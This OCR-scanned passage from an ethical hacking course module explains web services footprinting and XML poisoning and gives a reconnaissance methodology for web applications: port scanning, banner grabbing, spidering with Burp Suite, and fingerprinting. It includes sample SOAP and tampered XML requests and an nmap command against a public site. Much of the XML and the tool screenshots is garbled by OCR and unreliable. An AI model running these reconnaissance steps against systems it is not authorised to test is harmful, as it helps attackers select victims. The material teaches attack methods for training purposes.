POST /inquire HTTP/1.1 C ontent Type: text/xm l; charset=utf-8 SOAPAction: Cache-Control: no-cache Pragma: no-cache User-Agent: Java/1.4.2_04 Host: uddi.m iaosoft.com Accept: text/htm l,im age/gif, im ag e/jp eg /; q=.2, / ; q=.2 Connection: keep-alive Content-Length:229 <?xml version1.0 " " encoding " UTF-8" ?> <Envelop xmlns="h ttp://scem as.xm lsoap.org/soap/envelop/"> <Body> <find_business generi c2. 0": "maxRows"50" xmlns="urn"uddiorg:api_v2"xnam e>am azon</nam e></find_business> </Body> </Envek>p> HTTP/1.1 50 Continue
XM L Response
HTTP 200 1.1 OK Date: Tue. 28 S e p 2004 10:07:42 GMT Server: Microsoft !IS6 .0 X-Powered-By: A S P .N E T XAspNet-Vers-oo 1 1 4322 Cache-CortroJ: private, max-age=0 Content-Type: text/xml: charsot-utf 8 Contenl-Length: 1272 <?xm l versk>n=*l.0 encodir>g= utl- 8,'? >< 80ap:E nv 0l0p 0 xmlnssoap-'bttp /schemas xmlsoap org/soap/onvolopor xmlns:xsi-"hltp://www.w3.or0/2001XMLSchom a instance' xm1n8:xsd* hnp://www.w3.org/2001/XMLSchema,'><8oap:Bodyx8erv1ceList generic-^.O" operator-*Microsoft Corporation* truncated-"false" xmlns- ,urn:uddi-org:apl_v2<>servicelnfos><servicelnfo seYiceKey=*6ec464eO-218d-4dafb4dd-5dd4ba9dc8l3" businessKey=*9l4374tb-M01-4834-b8efc9c3408a0ce5*><namo xml lang-*on-us"> ^nam ox/sorvicolnloxsofvicolnlo $0fvic0K0y-*4 1213238 1b33 4014 8756 c89cc31250CC businossKoy-"bfb9dc23adoc-4173bd5f 5 54 5abacaalb"xnam c xml:lang-"en-us"> </namcx/scrviceln10xscfvicelnk> serv!ceKeyba6d9d56-a3M263-a95a-eebl 7e59l Odb" businessKey="18b71de2-dl 5c-437c-8877ebec82t6d0f5 x n a m e xml:lang=*en"> </namc></servicelnloxserviceln10 ser/iceKeybc82a008-5e4e4cOc-8dba-c5e4e268le12" busines8Key18785586-295e-448a-b759Cbb44a049t21x n a m o xm1.1ang=*on*> </name></servicolnfoxservicelnfo serviceKey-8faa80ea-42dd4cOd*8070999ce0455930" businessKey-"ee41518b-bf99-4a66-9e9ec33c4c43db5a*xname xH1 l:lang*en'> </name></servicelnlo><7serviceln10s></serviceList><;soap:Body><.'soap:
^
^ ^
W e b S e r v i c e s F o o t p r i n t i n g A tta c k
Attackers use Universal Business Registry (UBR) as major source to gather information
of web services. It is very useful for both businesses and individuals. It is a public registry that runs on UDDI specifications and SOAP. It is somewhat similar to a "W hois server" in functionality. To register web services on UDDI server, business or organizations usually use one of the following structures: Q Q e Business Entity Business Service Binding Temple Technical Model (tmodel)
Hence, attackers footprint a web application to get UDDI information such as businessEntity, businesService, bindingTemplate, and tModel.
Module 13 Page 1821
XML Query
POST/inquire HTTP/1.1 Content-Type: text/xml; charset=utf8 SOAPAction: " Cache-Control: no-cache Pragma: no-cache User-Agent: Java/1.4.2_04 Host: uddi.microsoft.com Accept: text/html, image/glf, image/jpeg,*; q=.2, /; q=.2 Connection: keep-alive Co nte ntLe ngth:229 <?xml version="1.0" encoding="UTF-8 " ?> <Envelop xmlns="http://scemas.xmlsoap.org/soap/envelop/"> <Body> <find_businessgeneric="2.0" maxRows"50" xmlns="urn"uddi0rg:api_v2 "xname>amaz 0n</namex/find_business> </Body> </Envelop> HTTP/1.1 SO Continue
XML Response
HTTP?1.1 200 OK Date: Tue, 28 Sep 2004 10:07:42 GMT Server: Microsoft-IIS'6.0 X-Powered-By: ASP NET X-AspNet Version: 1.1.4322 Cache-Control: private.axage-0 Content-Type: text/xm l: cnarset-ut(8 Content-Length: 1272 <?!tml version1.0- "encoding="utf-8"?xsoap:Envelope xmlns:soap nttp://schemas.xmlsoaporg/soap/enveloper xrnlns:xsi" h ttp ://www.w3.org/2001/XMLSchema instance" xmlns:*sd httpÂMWw.w3.org/2001/XMLSchema"><soap:BodyxserviceList generic^"2.0" operator" Microsoft Corporation" truncated" false'' xmlns" um:uddi-0rg:api_v2xservicelnfosxserviceln1o servjceKey=6ec464eO-2f8d-4dal-b4dd-5dd4ba9dc8f3 businessKey-91 4374fb-f10f-4634-b8elC9e34e8a0ee5'xname xml:lang='en-us"> </namex/servicelr1toxserv1celnto serviceKey=41213238-1 b33-40f4-8756-c89cc3125eoc" businessKey=bfb9dc23-adec-4(73-bd5f5545abaeaa1b'xname xml:lang="en-us"> </namexfeerviceln10xserviceln10 serviceKeyT>a6d9d56-ea3f-4263-a95a-eeb176591 Odb businessKey-"18b7fde2-d15c-437c-8877ebec8216d015'xname *1 ang-'en"> </namex/serv1 celnt0 xservicelnk> serv.ceKey"bc82aO08-5e4e-'1cOc-8dba-c5e4e268fe 1 businessKey-" 18785586-295e-448a-b759ebb44a049f21">cname xml:lang="en"> </namex/servicelnf0 xservcelnf0 serviceKey-8faa80ea-42dd-4c0d-8070-999ce0455930"businessKey-'ee41518b-b(99-4a66-9e9ec33c4c43db5a'xname *a5 1 lang.en> </name></servicelnfox/servicelnlos></serviceUst></soap:Bodyx'soap:
2 "
^ p w e io p o
FIGURE 13.30: Web Services Footprinting Attack
Module 13 Page 1822
Web S ervices XML Poisoning

poisoning in order to generate errors in XML parsing logic and break execution logic
C EH
Attackers insert malicious XML codes in SOAP requests to perform XML node manipulation or XML schema
Attackers can manipulate XML external entity references that can lead to arbitrary file or TCP connection openings and can be exploited for other web service attacks XML poisoning enables attackers to cause a denial-of-service attack and compromise confidential information
XML Request
<CustomerRecord> <CustomerNumber>2010</CustomerNumber> <FirstName>Jason</FirstName> <LastName>Springfield</LastName> <Address>Apt 20, 3rd Street</Address> <Email>jason@springfield.com</Email> <PhoneNumber>6325896325</PhoneNumber> </CustomerRecord>
Poisoned XML Request

<CustomerRecord> <CustomerNumber>2010</CustomerNumber> <FirstName>Jason</FirstName><CustomerNumber> 2010</CustomerNumber> <FirstName>Jason</FirstName> <LastName>Springfield</LastName> <Address>Apt 20, 3rd Street</Address> <Email>jason(springfield.com</Email> <PhoneNumber>6325896325</PhoneNumber> </CustomerRecord>
W e b S e rv ic e s X M L P o is o n in g
XML poisoning is similar to a SQL injection attack. It has a larger success rate in a web services framework. As web services are invoked using XML documents, the traffic that goes between server and browser applications can be poisoned. Attackers create malicious XML documents to alter parsing mechanisms like SAX and DOM that are used on the server. Attackers insert malicious XML codes in SOAP requests to perform XML node manipulation or XML schema poisoning in order to generate errors in XML parsing logic and break execution logic. Attackers can manipulate XML external entity references that can lead to arbitrary file or TCP connection openings and can be exploited for other web service attacks. XML poisoning enables attackers to cause a denial-of-service attack and compromise confidential information.
Module 13 Page 1823
FIGURE 13.31: Web Services XML Poisoning
Module 13 Page 1824
Hacking Methodology mm Web Application Hacking Tools
M o d u l e F lo w
So far, we have discussed web application components and various threats associated
with web applications. Now we will discuss web application hacking methodology. A hacking methodology is a way to check every possible way to compromise the web application by attempting to exploit all potential vulnerabilities present in it.
Web App Pen Testing
Web App Concepts
Security Tools
Web App Threats
Countermeasures
^ 1S1
Hacking Methodology
This section gives a detailed explanation of web application hacking methodology.
Module 13 Page 1825
# n ^
< n >
W e b A p p H a c k in g M e th o d o lo g y
In order to hack a web application, the attacker initially tries to gather as much
information as possible about the web infrastructure. Footprinting is one method using which an attacker can gather valuable information about the web infrastructure or web application.
Module 13 Page 1826
Footprint Web In frastructure

J
CEH
Web infrastructure footprintingis the first step in web application hacking; it helps attackers to select victims and identify vulnerable web applications
Hidden Content Discovery Server Discovery

Discover the physical servers that hosts web application Extract content and functionality that is not directly linked or reachable from the main visible content
Server Identification
Grab server banners to identify the make and version of the web server software
Service Discovery
Discover the services running on web servers that can be exploited as attack paths for web app hacking
F o o tp rin t W eb In fra s tru c tu re

W eb infrastructure footprinting is the first step in web application hacking; it helps attackers to select victims and identify vulnerable web applications. Through web infrastructure footprinting, an attacker can perform:
Server D iscovery
In server discovery, when there is an attempting to connect to a server, the redirector makes an incorrect assumption that the root of the URL namespace will be WebDAV-
aware. It discovers the physical servers that host web application.
Service D iscovery
Discovers the services running on web servers that can be exploited as attack paths for web app hacking. The service discovery searches a targeted application environment for loads and services automatically.
Server Identification
Grab the server banners to identify the make and version of the web server software. It consists of: Q Local Identity: This specifies the server Origin-Realm and Origin-Host.
Module 13 Page 1827
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil

Local Addresses: These specify the local IP addresses of the server that uses for Diameter Capability Exchange messages (CER/CEA messages).
Self-Names: This field specifies realms to be considered as a local to the server, it means that any requests sent for these realms will be treated as if there is no realm in the specified request send by the server.
H idden C ontent D iscovery

Extract content and functionality that is not directly linked or reachable from the main visible content.
Module 13 Page 1828
Footprint Web Infrastructure: Server Discovery

Server discovery gives information about the location of servers and ensures that the target server is alive on Internet
W hois lookup utility gives inform ation about the IP ad dress o f w eb se rv e r and DNS nam es W h ois Lookup Tools: e s http://www .tam os.com http://netcraft.com e G http://w w w .w hois.net http://www .dnsstuff.com
DNS Interrogation provides inform ation about the location and typ e o f se rve rs DNS In terrog atio n Tools: 9 http://www .dnsstuff.com http://network-tools.com 8 http://e-dns.org http://www.dom aintools.com
Port Scanning attempts to connect to a particular set of TCP or UDP ports to find out the service that exists on the server Port Scanning Tools:
9 8
Nmap NetScan Tools Pro
0 6
W hatsUp PortScannerTool Hping
F o o tp rin t W eb I n f r a s tr u c tu r e : S e rv e r D is c o v e ry
In order to footprint a web infrastructure, first you need to discover the active servers on the internet. Server discovery gives information about the location of active servers on the Internet. The three techniques, namely whois lookup, DNS interrogation, and port scanning, help in discovering the active servers and their associated information.
W hois Lookup
f3 ): Whois Lookup is a tool that allows you to gather information about a domain with the help of DNS and WHOIS queries. This produces the result in the form of a HTML report. It is a utility that gives information about the IP address of the web server and DNS names. Some of the Whois Lookup Tools are: e http://www.tamos.com http://netcraft.com http://www.whois.net http://www.dnsstuff.com
e e
0
DNS In terro g atio n
DNS interrogation is a distributed database that is used by varied organizations to
Module 13 Page 1829
connect their IP addresses with the respective hostnames and vice versa. When the DNS is improperly connected, then it is very easy to exploit it and gather required information for launching the attack on the target organization. This also provides information about the location and type of servers. Some of the tools are: http://www.dnsstuff.com http://network-tools.com http://e-dns.org http://www.domaintools.com
m m
Port Scanning
Port scanning is a process of scanning the system ports to recognize the open doors. If any unused open port is recognized by an attacker, then he or she can intrude into
B U I
the system by exploiting it. This method attempts to connect to a particular set of TCP or UDP ports to find out the service that exists on the server. Some of the tools are: Nmap NetScan Tools Pro W hatsllp Portscanner Tool Hping
Module 13 Page 1830
Footprint Web Infrastructure: Service Discovery
Copyright by HrCounctl. All Rights Reserved. Reproduction is Strictly Prohibited.
F o o tp rin t W eb In fra stru c tu re : S ervice D isco v ery

Service discovery finds the services running on web servers that can be exploited as attack paths for web application hacking. Service discovery searches a targeted application environment for loads and services automatically. The targeted server has to be scanned thoroughly so that common ports used by web servers for different services can be identified. The table that follows shows the list of common ports used by web servers and the respective HTTP services:
Port
Typical HTTP Services World W ide W eb standard port Alternate W W W Kerberos SSL (https) IBM Websphere administration client Compaq Insight Manager
80 81 88 443 900 2301
Module 13 Page 1831
2381 4 24 2 7001 7002 7070 8000 8001 8005 9090 10000
Compaq Insight Manager over SSL Microsoft Application Center Remote management BEA Weblogic BEA Weblogic over SSL Sun Java W eb Server over SSL Alternate W eb server, or W eb cache Alternate W eb server or management Apache Tomcat Sun Java W eb Server admin module Netscape Administrator interface
TABLE 13.1: Service Discovery
You can discover the services with the help of tools such as Nmap, NetScan Tools Pro, and Sandcat Browser. Source: http://nmap.org Nmap is a scanner that is used to find information about systems and services on a network and to construct a map of the network. It can also define different services running on the web server and give detailed information about the remote computers.
Zenmap
Scan Target: Tools Profile Help Scan Cancel
L=hJ
google.com nmap T4 -A -v -PE -PS22.25.80 -PA21.23.80.3389 google.com
Command:
Nmap Output Ports/Host! Topology | Host Details | Scans j OS < Host .9 google.com (74.12 # # < Port * Protocol * State < Service * Version SO 113 443 tcp tcp tcp open closed open http ident https
C
Filter Hosts
FIGURE 13.32: Zenmap Tool screenshot
Module 13 Page 1832
F o o tp r in t W e b I n f r a s t r u c t u r e : S e r v e r Id e n tific a tio n /B a n n e r G ra b b in g
CEH
Analyze the server response h ead er field to iden tify the make, m odel, and version of the w e b se rve r softw are This information helps attackers to select the exploits from vulnerability databases to attack a web server and applications
C : \ t e ln e t w w w . ju g g y b o y . com
80
H EAD
H T T P / 1 .0
H T T P/1 .1 2 0 0O K
a te ?rih u !C 0 9 5 Jj!id S s 5 ! C o n t e n t - L f rg t h : 1270

C on tent-T ype: t e x t/ M m l Connect io n ! C lo se
Server identified as M icrosoft IIS
sJt-CooklT*Cp5cis:CNIDTC0e0-PBLPKEK0N0<:K0FFIP0CHPLNE i
Via: 1.1 Application aid Content N etw orking System Software 5.1.15
n n e c tlo n t o h ot lo s t .
B a n n e r grab b in g to o ls:
1. Telnet
2. Netcat
3. ID Serve
4. Netcraft
, F o o tp rin t W eb I n f r a s tr u c tu r e : S e rv e r Id e n tific a tio n /B a n n e r G ra b b in g

Through banner grabbing, an attacker identifies brand and/or version of a server, an operating system, or an application. Attackers analyze the server response header field to identify the make, model, and version of the web server software. This information helps attackers to select the exploits from vulnerability databases to attack a web server and applications. C : \ t e ln e t www.juggyboy.com 80 HEAD / HTTP/1.0 A banner can be grabbed with the help of tools such as: Telnet Q e Netcat ID Serve Netcraft
These tools make banner grabbing and analysis an easy task.
Module 13 Page 1833
HTTP/l.1 200 O K ^ ________________________ Server identified Server: Date: Thu. 07 Jul 2005 13:08:16 G M T as Microsoft IIS Content-Length: 1270 Content-Type: text/html sit-CookieTASPESsf0NIDQCQTCQBQ=PBLPKEKBNDGK0FFIP0LHPLNE; path/ Via: 1.1 Application and Content Networking System Software 5.1.15 Connection: Close Connection to host lost. C:\>
:
F IG U R E 13.33: S e rv e r Id en tification /B an n er Grabbing
Module 13 Page 1834
Ethical Hacking and Countermeasures Hacking W eb Applications
Footprint Web Infrastructure: Hidden Content Discovery

J
C EH
Discover the hidden content and functionality that is not reachable from the main visible content to exploit user privileges within the application
It allows an attacker to recover backup copies of live files, configuration files and log files containing sensitive data, backup archives containing snapshots of files within the web root, new functionality which is not linked to the main application, etc.
Attacker-D irected Spidering

Web spiders automatically discover the hidden content and functionality by parsing HTML form and client-side JavaScript requests and responses Web Spidering Tools: S S OWASP Zed Attack Proxy Burp Spider WebScarab Attacker accesses all of the application's functionality and uses an intercepting proxy to monitor all requests and responses The intercepting proxy parses all of the application's responses and reports the content and functionality it discovers Tool: OWASP Zed Attack Proxy e Use automation tools such as Burp suite to make huge numbers of requests to the web server in order to guess the names or identifiers of hidden content and functionality
Copyright by
E&Coinal. All Rights Reserved. Reproduction is Strictly Prohibited.
Footprint Web Infrastructure: Hidden Content Discovery

Crucial information related to the business such as prices of products, discounts, login IDs, and passwords is kept secret. This information is usually not visible to outsiders. This information is usually stored in hidden form fields. Discover the hidden content and functionality that is not reachable from the main visible content to exploit user privileges within the application. This allows an attacker to recover backup copies of live files, configuration files, and log files containing sensitive data, backup archives containing snapshots of files within the web root, new functionality that is not linked to the main application, etc. These hidden fields can be determined with the help of three techniques. They are:
W eb S p id erin g
W eb spiders automatically discover hidden content and functionality by parsing HTML forms and client-side JavaScript requests and responses. Tools that can be used to discover the hidden content by means of web spidering include: Q Q OWASP Zed Attack Proxy Burp Spider WebScarab
Module 13 Page 1835
A ttack er-D irected S p id erin g

An attacker accesses all of the application's functionality and uses an intercepting proxy to monitor all requests and responses. The intercepting proxy parses all of the application's responses and reports the content and functionality it discovers. The same tool used for web spidering, i.e., OWASP Zed Attack Proxy can also be used for attacker-directed spidering.
B rute F o rcin g
Brute forcing is a very popular and easy method to attack web servers. Use automation tools such as Burp Suite to make large numbers of requests to the web server in order to guess the names or identifiers of hidden content and functionality.
Module 13 Page 1836
Web Spidering Using Burp Suite

Configure your web browser to use Burp as a local proxy Access the entire target application visiting every single link/URL possible, and submit all the application forms available Browse the target application with JavaScript enabled and disabled, and with cookies enabled and disabled Check the site map generated by the Burp proxy, and identify any hidden application content or functions Continue these steps recursively until no further content or functionality is identified
C EH
b u rpsu itefre ee d itio nv 1 .4 .0 1

uaeT repeater | sequencer ' aecoaer comparer | options | alpris resurs [ p93itons payloads ' options | target j po3mons
in tru d e ra tta c k1
payioaqs | options
com m ent
!re o u e s r
w cosovce* w o e * ?0 0
2 payweq poam ona
OCT / t b ? l d H ^ W 'r ' H9t: t9 - l.M t.b ln s .n e t P ro x y -c c n n c c c io tu ic e c p - 1 m U w - A j- n t: M o x tllA /S .a (Utnclowx NT t . 2; IfOWM) AppLeWebK1t/S3'J.') iKITOJL, Like Cecko) 1 ::9 .3 a
1 0 4 4 3 .
lencnn 4 6 *.
loauflit rssponso | nw r.-nm rrnfleri

MVO.. kl1.iM.LliUJ.UVl
n ^ <
OTT / t h 7 1 d - l . 4M 7C 150040::3 U [1 id l , I H T T P /I. I P xo x y -C o n n tc tio n : kwp-l.Lve 1 lM t lg * n e : K o x ilW S .O (Window* NT C. 2 ; V0V) A p p l *b K lt/5 1 7 . {KBTHL, lik e Oeeko) Chrowe/22.0. i2 29.9 l Srttor 1 /S 3 7 . 1 Accept: / M ttrtn h t t p : / / rf r f.3ainy.c0BV U *y s/ia 1:ch? q-blk*i11 id CCC770<SClCPJA9P:SA,SS9<J 5ir1C575D1:594*POPH-rcrRBA A ccvp t-Z n co d in g : JTip, d * f lu te , aclch Accept-lancrua{re: en-US, en: ct8 .0 ic c e p t- C fta r a e t: JSO -88S S-l,uc-8;r=0.7, '; q * 0 .3
-hrone/î.u. Iccvpt: /*
Satar1 / 6 3 7 .4
RZxx: h t t p : / / * w . b in g . c ocV inwicjv!/ it o c c M q-b i \c~*l id-CCC7'70 6 SCICD3 A5D2 EABE0 6351PE0S7SD 12 S54tP ORN-1OPRBA A c c e pt-E nco ding : rjz 1p, d e l l a t e , sdeti
| 0m atches
Copyright by
http://www.portswigger.net E&Coinal. All Rights Reserved. Reproduction is Strictly Prohibited.
Web Spidering Using Burp Suite

^ ^ Source: http://www.portswiRger.net Burp Suite is an integrated platform for attacking web applications.It contains all the Burp tools with numerous interfaces between them, designed to facilitate and speedup the attacking an application. Burp Suite allows you to combine manual and automated techniques to enumerate, analyze, scan, attack, and exploit web applications. The various Burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another. W eb spidereing using Burp Suite is done in the following manner: 1. Configure your web browser to use Burp as a local proxy process of
2. Access the entire target application visiting every single link/URL possible, and submit all the application forms available 3. Browse the target application with JavaScript enabled and disabled, and with cookies enabled and disabled 4. Check the site map generated by the Burp proxy, and identify any hidden application content or functions
Module 13 Page 1837
5.
Continue these steps recursively until no further content or functionality is identified

burp suite free edition v1.4.01
burp intruder repeater window about scanner
intruder | repeater | sequencer | decoder j comparer options | alerts spider
7 * ____________
f
target 1 positions | payloads [ options
attack type
sniper length: 465
2 payload positions
GET /th?id=SI458766150048223 ISipid=5115 HTTP/1.1 Host: ts4.mm.bing.net Proxy-Connection: keep-alive User-Agent: Hozilla/5.0 (Vindovs NT 6.2; OV64) AppleVebKit/537.4 (KHTML, like Gecko) Chrome/22..1229.94 Safari/537.4 Accept: */* Referer: http://wwv.bing.com/images/3earch?qbike3 4id*6CCC7670 65ClCD3A9D2EABE86351FE8575D12594&FORM=IQFRBA Accept-Encoding: gzip,deflate,sdch
J 0 matches
ciear auto refresh clear
intruder attack 1
attack save columns
Filter showing all items results request target ' positions [ payloads ' options position payload status sfc 200 error time... length 10443 193 10443 comment baseline request
Web Service Attack 400 Web Service Attack. 200 request [ response raw |params | headers j hex
GET /th?id-I.458766150048223l&pid-1.1 HTTP/1.1 Host: ts4.mrn.bing.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.2; 064) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4 Accept: */* Referer: http://wwv.bing. com/images/search?q=bikesSid=6CCC767065ClCD3A9D2EABE863 51FE8575D12S94SFOP.M=IQFP.BA Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7, *;c[0.3
i An _r -1 ngp_________________________________________________________________
(z h
zhzh
inished
FIGURE 13.34: Server Identification/Banner Grabbing
Module 13 Page 1838
Web Spidering Using Mozenda Web Agent Builder

J Mozenda Web Agent Builder crawls through a website and harvests pages of information
CEH
Copyright by E&Couacil. All Rights Reserved. Reproduction is Strictly Prohibited.
Web Spidering Using M ozenda Web Agent Builder

Source: http://www.mozenda.com Mozenda W eb Agent Builder is a Windows application used to build your data extraction project. It crawls through a website and harvests pages of information. W eb Agent Builder is a tool suite that includes an intuitive Ul and a browser-based instruction set. Setting up your crawler is as simple as pointing and clicking to navigate pages and capture the information you want.
Module 13 Page 1839
( m eccnda M# & 0 I cot Agent ^
WebAgentl (not saved) - Mixenda Web Agent Ouildei rtttp:/Mrtw1 ftJ^ttK1y< 0 v1 */sa 1 1 o1g * ^ S i% n c 1 * / * 7J0p -;- )H 7 Share 1 8 Pi0d t O rm htip top!... S
- O -c ip
N ow Action Use the tools below to perform actions on ttie oaue Cick an item O f Capture text or im age ) Set jeer input Create a list of items
r
Choose son order Date: Newest
Writ* o Review
Customer Rating Selected Action Modify the behavior of the selected action
L o v t m y tiv i v ' 9/2 1 3 / JJPTCRZY from RO-IIOMC, CA Read s i ru re/6w3 Picture Quolty Sound Quarry Features 5-C &0 5.0
y &
View action properties Change item location
Whet's greet ebout i t WAS VERY EASYTC SET UP, REMOTE EASYTO USE FOR FEATURES *GREAT =>CR.RE AMD FEATJRES VERY USER FREMDLY. EASY TO SET U F WouKS you recommend this productto a friend?; Yes Use the tools above to add a new action to this page modify the behavior of the currently selected action ^
Sie re R e > c rt.

PaocL Begin Rem List Item Namelist Capture Item Name Capture frice capture. Rating Capture Model Click Item End Uit
Was Ttt r/ew r p U? res Ho Repor rappr39nare review
Customer Retina rutxy Picture C1/13TC01
Review Rating
Fevie* What* great boot it WAS VERY EAS .
Would recommend Yet
EZ^H
3.0
Begin Item list Review Retinol- Capture Review Rating Capture Review Capture Would recommend v[2J/e 1(2] /drv[4) / d ir l 1
4 J> AJ)
Whets great about it. Great SoundWh... No Whet's greet about it: nice feeturesW... Yes What's great aoout it good price, loo... Yet
l1 /to a d ynjytr[!]/
FIGURE 13.35: Web Spidering Using Mozenda Web Agent Builder
Module 13 Page 1840
Attack Web Servers
Attack Authentication Mechanism
Attack Session Management Mechanism
Attack Data Connectivity
Attack Web Services
Web App Hacking Methodology Attack Web Servers

Once you conduct full scope footprinting on web infrastructure, analyze the gathered information to find the vulnerabilities that can be exploited to launch attacks on web servers. Then attempt to attack web servers using various techniques available. Each and every website or web application is associated with a web server that has code for serving a website or web application. The attacker exploits the vulnerabilities in the code and launches the attacks on the web server. Detailed information about hacking web servers will be explained on the following slides.
Module 13 Page 1841
Hacking Webservers
5. Once the attacker identifies the web server environment, attackers scan for known vulnerabilities by using a web server vulnerability scanner. Vulnerability scanning helps the attacker to launch the attack easily by identifying the exploitable vulnerabilities present on the web server. Once the attacker gathers all the potential vulnerabilities, he or she tries to exploit them with the help of various attack techniques to compromise the web server. In order to stop the web server from serving legitimate users or clients, the attacker launches a DoS attack against the web server. You can launch attacks on the vulnerable web server with the help of tools such as UrIScan, Nikto, Nessus, Acunetix W eb Vulnerability Scanner, Weblnspect, etc.
Module 13 Page 1842
Web Server Hacking Tool: Weblnspect

J Weblnspect identifies security vulnerabilities in the web applications J It runs interactive scans using a sophisticated user interface Attacker can exploit identified vulnerabilities to carry out web services attacks "* 2 u t
C EH
* * * -
" * w o
https://download.hpsmartupdate.com
Webserver Hacking Tool: Weblnspect

Source: https://download.hpsmartupdate.com Weblnspect software is web application security assessment software designed to thoroughly analyze today's complex web applications. It delivers fast scanning capabilities, broad assessment coverage, and accurate web application scanning results. It identifies security vulnerabilities that are undetectable by traditional scanners. Attackers can exploit the identified vulnerabilities for launching web services attacks.
Module 13 Page 1843
Im * . J
T m* V i *M . a t !**"* !
M * '^
| O
____j
jj>---a*w in c * * acM *.
! !
; *ftm t M > V * -*, km bN M K t ~ ~ ~ O w lM Kvti H l
s ! L 1 _ J u I ! 1 ! w w w m u 1 t * I t I 1 1 t 1
**r * W r * * m i M M t a x * * ;..* ! i*m z srC L. * * * !
M > *
9 0 * 4 0 1
1 M C M ' I
h
j P
" 5 s ^ ,hK l
9
X. -
: w "
I * . I P I r tM J * wm m 1 m #n!m -
FIGURE 13.36: Weblnspect Tool Screensot
Module 13 Page 1844
Attack W eb Servers
Attack Web Services
Web App Hacking Methodology Analyze Web Applications

Analyzing the web application helps you in identifying different vulnerable points that can be exploitable by the attacker for compromising the web application. Detailed information about analyzing a web application and identifying the entry points to break into the web application will be discussed on the following slides.
Module 13 Page 1845
Analyze Web Applications
itfciul Nh
EH
Analyze the active application's functionality and technologies in order to identify the attack surfaces that it exposes
Identify E n try Points for U ser Input

Review the generated HTTP request to identify the input entry points
Identify S e rve r-S ide Functionality

Observe the applications revealed to the client to identify the server-side structure and functionality
Identify S e rve r-S ide Technologies

Fingerprint the technologies active on the server using various fingerprint techniques such as HTTP fingerprinting
Map the A tta c k Surface

Identify the various attack surfaces uncovered by the applications and the vulnerabilities that are associated with each one
Copyright by E&Caindl. All Rights Reserved.!Reproduction is Strictly Prohibited.
j Analyze Web Applications

----W eb applications have various vulnerabilities. First, basic knowledge related to the web application has to be acquired by the attacker and then analyze the active application's functionality and technologies in order to identify the attack surfaces that it exposes. Identify Entry Points for User Input The entry point of an application serves as an entry point for attacks; these entry points include the front-end web application that listens for HTTP requests. Review the generated HTTP request to identify the user input entry points. Identify Server-side Functionality Server-side functionality refers to the ability of a server that executes programs on output web pages. Those are scripts that reside and also allow running interactive web pages or websites on particular web servers. Observe the applications revealed to the client to identify the serverside structure and functionality. Identify Server-side Technologies Server-side technologies or server-side scripting refers to the dynamic generation of web pages that are served by the web servers, as they are opposed to static web pages that are in the storage of the server and served to web browsers. Fingerprint the technologies active on the server using various fingerprint techniques such as HTTP fingerprinting.
Map the Attack Surface Identify the various attack surfaces uncovered by the applications and the vulnerabilities that are associated with each one.
Module 13 Page 1847
A nalyze Web Applications: Id e n tify E n try Points for U&er In p u t

Examine URL, HTTP Header, query string parameters, POST data, and cookies to determine all user input fields
Identify HTTP header parameters that can be processed by the application as user inputs such as User-Agent, Referer, Accept, Accept-Language, and Host headers
Determine URL encoding techniques and other encryption measures implemented to secure the web traffic such as SSL Tools used: Burp Suite HttPrint WebScarab OWASP Zed Attack Proxy
. Copyright by E&CaiHGO. All Rights Reserved.!Reproduction is Strictly
Prohibited.
Analyze Web Applications: Id en tify Entry Points for User Input

Q During the web application analysis, attackers identify entry points for user input so that they can understand the way the web application accepts or handles the user input. Then the attacker tries to find the vulnerabilities present in input mechanism and tries to exploit them so that attacker can associate with or gain access to the web application. Examine URL, HTTP Header, query string parameters, POST data, and cookies to determine all user input fields. 0 Identify HTTP header parameters that can be processed by the application as user inputs such as User-Agent, Referrer, Accept, Accept-Language, and Host headers. 0 Determine URL encoding techniques and other encryption measures implemented to secure the web traffic such as SSL. The tools used to analyze web applications to identify entry points for user input include Burp Suite, HttPrint, WebScarab, O W A SP Zed Attack Proxy, etc.
Module 13 Page 1848
Analyze Web Applications: Identify Server-Side Technologies
Perform a detailed server fingerprinting, analyze HTTP headers and HTML source code to identify server side technologies
Examine URLs for file extensions, directories, and other identification information
error page
Examine the messages
Examine session tokens:
a JSESSIONID- Java ASPSESSIONID-IIS server ASP.NET_Sessionld A SP.N ET PH PSESSID- PHP
i w
http://juggyboy.com/8rror.aspx
MicrosafMIS/6 0
Microxaft-IISJfl 0
O ops!
Server Error in ,/ReportServer' Application. Could not find the permission set named 'ASP.Net'. Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. Version Information: Microsoft .Net Framework Version 4.0.30319; ASP.Net Version 4.0.30319.1
Apache;2 0.32 iFtnlura,!
SunONE Webserver 0 0, NeUcape-Er4e1pr.se/4 1
\ 1
Micros oft-IISi'6.0.0
Server Side Technologies <
Analyze Web Applications: Id en tify Server-Side Technologies

Source: http://net-square.com After identifying the entry points through user inputs, attackers try to identify server-side technologies. The server-side technologies can be identified as follows: 1. Perform a detailed server fingerprinting, analyze HTTP headers and HTML source code to identify server side technologies Examine URLs for file extensions, directories, and other identification information Examine the error page messages Examine session tokens: e JSESSION ID - Java
ASPSESSION I D-I I S server e e ASP.NET_SessionlD-ASP.NET PHPSESS I D - P H P
Module 13 Page 1849
P H
web server fingerprinting report

host www airs ahara net eastcoas tfight com www redhat.com www cnn com chaseon1ine.chase.com wwwfoundstone.com wwwwalmart.com port 80 banner reported Microsoft-IIS/6 0 Apache/2.0.52 (Fedora) 4 : 3 ~y Apache banner deduced Mlcrosoft-IIS/6.0 Apache/2.0.x Apache/1.3.27 Apache/2 0.x SunONE Webserver 6.0. Netscape-Emerpnse/4.1 Apache/2.0.x Apache/2.0.x Microsoft-lIS/4.0. MicrosofWIS5.0 ASP.NET. MicrosoftIIS/5.1 V V 1
e e s i
hp ://ju eev1 > o y r.com/error.aspx
L l l ________ 1 V V 1 ' 1 1
4
n 1 1 i I 1
Server Error in /ReportServer' Application. Could not find the permission set named 'ASP. Net'. Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Version Information: Microsoft Net Framework Version
~
443 7 80 SC
Apache JPMC1.0 WebSTAR Microsoft-IIS/6 0.0 Yes we are using ServerMask!
ffuu por 30sc/ . ware com 80
;-< Server Side Technologies >
4.0.30319; ASP.Net Version 4.0.30319.1
